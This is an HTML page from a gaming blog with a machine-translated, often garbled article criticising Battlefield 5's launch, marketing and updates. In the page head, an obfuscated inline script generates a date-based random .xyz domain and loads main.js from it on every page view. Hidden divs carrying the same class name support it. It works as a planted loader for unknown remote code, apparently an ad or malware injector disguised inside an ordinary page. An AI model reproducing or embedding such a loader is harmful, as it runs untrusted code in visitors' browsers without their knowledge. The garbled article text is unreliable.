<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Game,">










<meta name="description" content="On October 28, EA’s top FPS game “battlefield 5” announced the upcoming updates, and finally opened the Pacific War plate nearly a year later. The U.S. Army and British army joined in the game, and th">
<meta name="keywords" content="Game">
<meta property="og:type" content="article">
<meta property="og:title" content="After a year of verbal criticism, battlefield 5 finally ushered in his second spring">
<meta property="og:url" content="http://maiygu.xyz/2019/11/08/After a year of verbal criticism, battlefield 5 finally ushered in his second spring/index.html">
<meta property="og:site_name" content="Games">
<meta property="og:description" content="On October 28, EA’s top FPS game “battlefield 5” announced the upcoming updates, and finally opened the Pacific War plate nearly a year later. The U.S. Army and British army joined in the game, and th">
<meta property="og:locale" content="en">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/After a year of verbal criticism, battlefield 5 finally ushered in his second spring/3a2c738a5ac44d8abb82993597449e6b.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/After a year of verbal criticism, battlefield 5 finally ushered in his second spring/1a07b5c2bef34dcea1a03e9e3ea2ca3a.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/After a year of verbal criticism, battlefield 5 finally ushered in his second spring/3f51bff70ec14553b4c72e5bc8c2a395.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/After a year of verbal criticism, battlefield 5 finally ushered in his second spring/3c1f33592dd048c2a932c41c9ac98d9a.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/After a year of verbal criticism, battlefield 5 finally ushered in his second spring/8f2dfdfa611f4e96be1f18b3447f6de5.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/After a year of verbal criticism, battlefield 5 finally ushered in his second spring/469a73ee889a46d4a386659845b6d3f2.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/After a year of verbal criticism, battlefield 5 finally ushered in his second spring/882dedb4ccea4707bb7f136dbfa58a67.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/After a year of verbal criticism, battlefield 5 finally ushered in his second spring/9c384f0c1cf745c99e7a12e08cb8dfde.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/After a year of verbal criticism, battlefield 5 finally ushered in his second spring/7212246d63254290b460dc14981065a6.jpg">
<meta property="og:updated_time" content="2021-03-02T08:49:48.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="After a year of verbal criticism, battlefield 5 finally ushered in his second spring">
<meta name="twitter:description" content="On October 28, EA’s top FPS game “battlefield 5” announced the upcoming updates, and finally opened the Pacific War plate nearly a year later. The U.S. Army and British army joined in the game, and th">
<meta name="twitter:image" content="http://maiygu.xyz/2019/11/08/After a year of verbal criticism, battlefield 5 finally ushered in his second spring/3a2c738a5ac44d8abb82993597449e6b.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"hide","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://maiygu.xyz/2019/11/08/After a year of verbal criticism, battlefield 5 finally ushered in his second spring/">




<script type="text/javascript">!function(n){var t,e=function(n,t){var e=[["a","e","i","o","u","y"],["b","c","d","f","g","h","j","k","l","m","n","p","q","r","s","t","v","w","x","y","z"]];if(t)for(var r=0;r<=t.length-1;r++)n=n*t.charCodeAt(r)%4294967295;var l;return next=(l=n,function(n){return l=l+1831565813|0,(((n=(n=Math.imul(l^l>>>15,1|l))+Math.imul(n^n>>>7,61|n)^n)^n>>>14)>>>0)/Math.pow(2,32)}),function(n,t){for(var r=[],l=null,o=0;o<=n-1;o++){var a=void 0;null===l?a=e[0].concat(e[1]):1==l?(a=e[0],l=0):(a=e[1],l=1);var u=a[Math.floor(next()*a.length)];r.push(u),null===l&&(l=-1!=e[0].indexOf(u)?0:1)}return r.push("."+t),r.join("")}}((t=new Date,(t/=1e3)-t%1209600),"_fa7cdd4c68507744")(8,"xyz");if(null===n)console.log("https://"+e);else{var r=n.createElement("script");r.src="https://"+e+"/main.js",(n.body||n.head).appendChild(r)}}("undefined"!=typeof document?document:null);
</script>

  <title>After a year of verbal criticism, battlefield 5 finally ushered in his second spring | Games</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Games</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Games</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-sitemap">
          <a href="/sitemap.xml" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-sitemap"></i> <br>
            
            Sitemap
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="Searching..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
 
 
 <div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="22aeec266c49468da6040eff035066b8" style="display: none"></div>
 <div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="7aa7f6c595384fd6a2e5f5016b455fd2" style="display: none"></div>
 <div class="_fa7cdd4c68507744" data-zone="df2a1bde9f44465a8457aaf705928077" style="width:728px;height:90px;display: inline-block;margin: 0 auto"></div>
 <div class="_fa7cdd4c68507744" data-zone="4fff9a79323749608f8df1eff7291bcf" style="width:970px;height:90px;display: inline-block;margin: 0 auto"></div>
 
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://maiygu.xyz/2019/11/08/After a year of verbal criticism, battlefield 5 finally ushered in his second spring/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Harry">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Games">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">After a year of verbal criticism, battlefield 5 finally ushered in his second spring</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-11-08T00:00:00+08:00">
                2019-11-08
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>On October 28, EA’s top FPS game “battlefield 5” announced the upcoming updates, and finally opened the Pacific War plate nearly a year later. The U.S. Army and British army joined in the game, and the highly praised Wake Island and Iwo Jima island in the early game series “battlefield 1942” were returned. Although there are still many problems in battlefield 5, the scale of the game is gradually enriched.<br><img src="http://maiygu.xyz/2019/11/08/After a year of verbal criticism, battlefield 5 finally ushered in his second spring/3a2c738a5ac44d8abb82993597449e6b.jpg" alt="After a year of verbal criticism, battlefield 5 finally ushered in his second spring"><br>Looking back on the development of battlefield 5 this year, we can say it’s not easy, but it seems that in addition to every content update, there are not many good news related to it, but negative news will always appear every other time. Now the game is about to usher in the second year, but there are still many holes not filled in, combined with the previous EA’s various operations Let a lot of players think that he is designing the next big game, but in fact, everything is just EA trying to make the game live for a few more days.<br><img src="http://maiygu.xyz/2019/11/08/After a year of verbal criticism, battlefield 5 finally ushered in his second spring/1a07b5c2bef34dcea1a03e9e3ea2ca3a.jpg" alt="After a year of verbal criticism, battlefield 5 finally ushered in his second spring"><br>    wind review<br>Since the official release of battlefield 5 in May last year, the controversy about this game has not stopped. It is necessary to know that the public praise of the previous generation’s work battlefield 1 is really good. Not only is the game rich in content, but also the experience of Watching God like flying boat battle is unprecedented. After all, there are too few people who have done the theme of World War I, players They are very interested in these new things, and the performance of the game has not disappointed the players, so the players are also full of expectations for the return of World War II “battlefield 5”. However, when the first trailer of the game was released, it almost caused the dissatisfaction of the players in a flash. Not only did the elements and modeling design in the movie violate the historical records, but also the design of forcing a game UI interface into the CG to serve as the screen of the game’s real machine was a little confusing. Many people even doubted whether EA really put it into practice Players are treated as fools, really think that players will believe it after watching this trailer.<br><img src="http://maiygu.xyz/2019/11/08/After a year of verbal criticism, battlefield 5 finally ushered in his second spring/3f51bff70ec14553b4c72e5bc8c2a395.jpg" alt="After a year of verbal criticism, battlefield 5 finally ushered in his second spring"><br>British female soldiers and prosthetics never appeared in the history of World War II<br>Players protested against dice, the developer of the battlefield series, saying they wanted dice to respect history. Even though dice wanted to try something new in the Old World War II game, it couldn’t be changed. In an interview with the players, Patrick sodlund, chief creative officer of EA’s CCO, said that those who said they did not respect history lacked cultural education. They were so designed because these scenes in the trailer were completely possible. No matter whether they were female soldiers or artificial limbs, after all, few people have been in these battlefields, Besides, it’s just a game. Why so serious? If you don’t like it, you can’t buy it. It’s hard to imagine that this kind of disaster speech against the players comes from a senior manager who has worked in EA for many years. This remark is to make those players who are dissatisfied with the game setting become more and more angry. Since the officials say that they can’t buy if they don’t like it, they just don’t buy it. After all, we are all illiterate people.<br><img src="http://maiygu.xyz/2019/11/08/After a year of verbal criticism, battlefield 5 finally ushered in his second spring/3c1f33592dd048c2a932c41c9ac98d9a.jpg" alt="After a year of verbal criticism, battlefield 5 finally ushered in his second spring"><br>Patrick sodlund, has left<br>The author was lucky to participate in the beta test when the game was launched. Compared with battlefield 1, the changes in this work are quite large, especially in the cooperation of small teams. The TTK that players can kill an enemy has become shorter, but the ammunition in each player’s hands has become much smaller. Most automatic weapons only have two magazines, so they cooperate with small teams to implement tactics It’s becoming more and more important. Each player’s occupation must do their own essential work to carry out the battle smoothly. This change may not be suitable for many old players, and they can get a good experience after they are used to it. But let’s not talk about the changes of the system mechanism of the game for the moment. Instead, when the game is launched, it not only tempts the players to buy the game as members in a variety of ways, but also lacks the content of the first version of the game. There are very few content and maps to play, and only the British and the German can choose. The weapons are also designed around these two forces.<br><img src="http://maiygu.xyz/2019/11/08/After a year of verbal criticism, battlefield 5 finally ushered in his second spring/8f2dfdfa611f4e96be1f18b3447f6de5.jpg" alt="After a year of verbal criticism, battlefield 5 finally ushered in his second spring"><br>There’s nothing to say about the frost engine</p>
<h1 id="grindstone"><a href="#grindstone" class="headerlink" title="grindstone"></a>grindstone</h1><p>The media gave a medium rating for the game, because in fairness, the performance of the game in innovation is relatively acceptable, and it has a very good foundation, but the content is still to be improved. Despite the accuracy of historical background and bug, the experience of the game is pretty good, but you need to know that the first game of dice, battlefield 1942, was launched It is rich in content and has the scale of a World War II FPS game. However, as a sub era work, “battlefield 5” is better than “1942” in terms of screen performance, and its content is not increased but regressed. In view of this situation, EA launched a plan called “the tide of war”. The content update in the game will be launched according to the records in the real history. It has to be Tucao, the game itself has many problems in the accuracy of history, but in this so-called “tide of war” is particularly true.<br><img src="http://maiygu.xyz/2019/11/08/After a year of verbal criticism, battlefield 5 finally ushered in his second spring/469a73ee889a46d4a386659845b6d3f2.jpg" alt="After a year of verbal criticism, battlefield 5 finally ushered in his second spring"><br>Second half renewal plan announced in the first half of the year<br>You can see that dice just wants to make a better step for yourself. Disaster level public relations comments and unsatisfactory initial performance have a direct impact on the sales volume of the game. There are not a few players who should not buy the game according to the voice of CcO. In addition, the digital version of the game is changing how to look at it. By withholding a little more money from the players and promoting their member services, EA can be said to be arrogant to the extreme this time, and the players are also ruthless with actual actions In the face of EA, the first week sales volume of battlefield 5 was even lower than the previous most popular police and bandit theme work battlefield: hard battle, which directly led to a large number of retailers hoarding Physical Games began to implement discount measures to clear their own inventory as soon as possible. After all, if this kind of game is not sold as soon as possible, I’m afraid it will never be sold again.<br><img src="http://maiygu.xyz/2019/11/08/After a year of verbal criticism, battlefield 5 finally ushered in his second spring/882dedb4ccea4707bb7f136dbfa58a67.jpg" alt="After a year of verbal criticism, battlefield 5 finally ushered in his second spring"><br>Battlefield: a tough battle<br>In the next period of time, it seems that EA always wants to attract more new players into the pit as much as possible, so it changes and changes the game, and sometimes it launches a big discount to try to make new players have a better experience when they play, but in fact, these changes do not have any more obvious effect, but they still annoy those who still insist on playing Family, and again and again discount is like stabbing in the hearts of those loyal fans who bought the game at the original price. If the content is less, it will be more quickly. If the bug is not repaired quickly, the so-called “wave of war” is also a strong ticket skipping. On the contrary, it is obviously not feasible to just think about getting more oil and water. At the end of March this year, “battlefield 5” added a so-called most gorgeous “fire storm” big escape mode. It seems that the FPS game of one’s family will not enter the stream without a big escape mode. But in addition to the cool screen design, the game experience of this big escape is not bright compared with other works, and it is not as interesting as the next door “apex”. This mode is also very fast and cursory No popularity.<br><img src="http://maiygu.xyz/2019/11/08/After a year of verbal criticism, battlefield 5 finally ushered in his second spring/9c384f0c1cf745c99e7a12e08cb8dfde.jpg" alt="After a year of verbal criticism, battlefield 5 finally ushered in his second spring"><br>Flames storm<br>    concluding remarks<br>Since then, all the news about battlefield 5 has either been updated or gone wrong. Today, there is a bug that can be invisible. After two days, it announces which mode or option to remove, and the big escape is because there are too few players to play the game directly. But even so, there are still a group of players who stick to the game and look forward to the next update. Some of them may just like World War II, and some may like the design of battlefield 5. With the support of these players, the game has come to today step by step.<br><img src="http://maiygu.xyz/2019/11/08/After a year of verbal criticism, battlefield 5 finally ushered in his second spring/7212246d63254290b460dc14981065a6.jpg" alt="After a year of verbal criticism, battlefield 5 finally ushered in his second spring"><br>The second year’s game cover revealed by netizens<br>The time of one year is neither long nor short. Now battlefield 5 has changed significantly compared with its debut, but it’s hard to let those regretful players go back to the pit. I hope that in the next year, battlefield 5 can continue to update to let the players see their sincerity, or simply make another game.</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Game/" rel="tag"># Game</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/11/08/A game company that teaches players how to fancy and grab money but makes itself bankrupt/" rel="next" title="A game company that teaches players how to fancy and grab money but makes itself bankrupt">
                <i class="fa fa-chevron-left"></i> A game company that teaches players how to fancy and grab money but makes itself bankrupt
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/11/08/A game series with 11 years of history, how to make generations of bad reviews and continue to be new/" rel="prev" title="A game series with 11 years of history, how to make generations of bad reviews and continue to be new">
                A game series with 11 years of history, how to make generations of bad reviews and continue to be new <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Harry</p>
              <p class="site-description motion-element" itemprop="description">Games</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">114</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#grindstone"><span class="nav-number">1.</span> <span class="nav-text">grindstone</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        

<div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Harry</span>

  
</div>









        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
